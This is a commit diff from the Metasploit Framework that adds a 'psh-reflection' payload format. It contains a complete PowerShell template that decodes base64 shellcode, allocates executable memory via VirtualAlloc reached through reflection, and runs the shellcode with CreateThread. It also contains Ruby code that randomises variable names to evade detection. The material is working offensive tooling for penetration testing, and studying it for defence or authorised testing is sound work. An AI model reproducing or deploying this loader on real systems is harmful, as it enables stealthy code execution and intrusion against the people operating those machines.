Landing rapid7#2767, @Meatballs1 Powershell Reflective Payload

Author: zeroSteiner

LICENSE

@@ -15,6 +15,10 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
+License: BSD-3-clause
+
 Files: data/john/*
 Copyright: 1996-2011 Solar Designer.
 License: GPL-2

data/templates/scripts/to_mem_pshreflection.ps1.template

@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+	Param ($%{var_module}, $%{var_procedure})		
+	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+	
+	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+	)
+	
+	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	
+	return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+		
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null

lib/msf/util/exe.rb

@@ -782,7 +782,7 @@ def self.to_exe_vba(exes='')
     return read_replace_script_template("to_exe.vba.template", hash_sub)
   end
 
-def self.to_vba(framework,code,opts={})
+  def self.to_vba(framework,code,opts={})
     hash_sub = {}
     hash_sub[:var_myByte]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
     hash_sub[:var_myArray]		  = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
@@ -920,6 +920,33 @@ def self.to_win32pe_psh(framework, code, opts={})
     return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
 
+  #
+  # Reflection technique prevents the temporary .cs file being created for the .NET compiler
+  # Tweaked by shellster
+  # Originally from PowerSploit
+  #
+  def self.to_win32pe_psh_reflection(framework, code, opts={})
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:func_get_proc_address)
+    rig.init_var(:func_get_delegate_type)
+    rig.init_var(:var_code)
+    rig.init_var(:var_module)
+    rig.init_var(:var_procedure)
+    rig.init_var(:var_unsafe_native_methods)
+    rig.init_var(:var_parameters)
+    rig.init_var(:var_return_type)
+    rig.init_var(:var_type_builder)
+    rig.init_var(:var_buffer)
+    rig.init_var(:var_hthread)
+
+    hash_sub = rig.to_h
+
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
+
+    return read_replace_script_template("to_mem_pshreflection.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
   def self.to_win32pe_vbs(framework, code, opts={})
     to_exe_vbs(to_win32pe(framework, code, opts), opts)
   end
@@ -1712,6 +1739,9 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
 
     when 'psh-net'
       output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts)
+      
+    when 'psh-reflection'
+      output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts)
 
     end
 
@@ -1735,6 +1765,7 @@ def self.to_executable_fmt_formats
       "msi-nouac",
       "psh",
       "psh-net",
+      "psh-reflection",
       "vba",
       "vba-exe",
       "vbs",